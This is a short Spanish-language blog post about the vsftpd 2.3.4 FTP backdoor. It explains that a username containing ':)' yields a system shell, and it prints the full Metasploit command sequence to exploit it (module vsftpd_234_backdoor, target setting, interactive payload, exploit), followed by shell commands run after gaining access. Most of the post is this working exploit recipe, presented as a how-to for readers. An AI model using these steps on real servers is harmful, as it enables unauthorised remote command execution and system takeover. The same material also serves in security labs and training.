Hace poco se descubrió una grave (
El Backdoor consiste en que accediendo al FTP y poniendo de usuario :) se conseguía acceso total y ejecución de comandos en el servidor al devolver una shell del sistema. Así de simple.
Y bueno, para eso les traigo un video de como explotarlo con MSF:
Después de ver el video me dirán "Pero que estupidez, para que hacerlo con Metasploit si es más fácil manualmente", a lo cual respondo que si, pero quería ponerles algo audiovisual (para que no se viera tan pobre el post) y además para nuevamente hacer notar que con MSF se pude hacer de todo...
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
[+] Salu2
[+] Zion3R
0 Notaciones:
Publicar un comentario